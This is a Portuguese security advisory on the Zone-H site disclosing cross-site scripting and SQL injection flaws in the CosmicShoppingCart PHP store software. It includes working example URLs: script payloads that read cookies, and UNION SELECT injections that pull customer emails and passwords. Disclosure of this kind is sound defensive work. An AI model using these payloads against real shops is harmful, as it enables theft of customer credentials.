Zone-H Advertisement
Home arrow Avisos de Segurança arrow CosmicShoppingCart: Diversas falhas
06 de September de 2008
  
 
Ataques desta semana
O.S.  Defs.  %

Total de ataques: 0 dos quais 0 único(s) no ip e 0 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
CosmicShoppingCart: Diversas falhas PDF Imprimir E-mail
Avaliação do Usuário: / 5
PiorMelhor 
Por Marcelo Almeida (Vympel)   
24 de May de 2006
Software: CosmicShoppingCart (www.cosmicphp.com)
Risco: Médio
Descoberto por: Marcelo Almeida (Vympel)

CosmicShoppingCart é um sistema de e-commerce baseado em PHP / MySQL. Desenvolvido para ser um sistema altamente gerenciável de shopping online

Descrição:

Multiplas falhas de Cross site scripting e SQL injection foram descobertas.


Detalhes:

1)Multiplos ataques de Cross site scripting foram descobertos nas seguintes páginas:
cosmicshop/search.php
cosmicshop/search_cat.php
cosmicshop/search_price.php
cosmicshop/product_details.php

Exemplos:
cosmicshop/search.php?query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
cosmicshop/search_cat.php=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E


2)SQL injections foram descobertos nesta página podendo o invasor identificar dados dos administradores assim como modificar valores ou outras coisas que lhe for conviniente.

Exemplos:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

Contatos com o fabricante:

Primeiro contato: 16/02/2005
Segundo contato: 25/03/2006
Publicação do Alerta: 25/05/2006

 
< Anterior
[Voltar]
 
Top!
(C) 2008 Zone-H - Informação sem restrição
Top!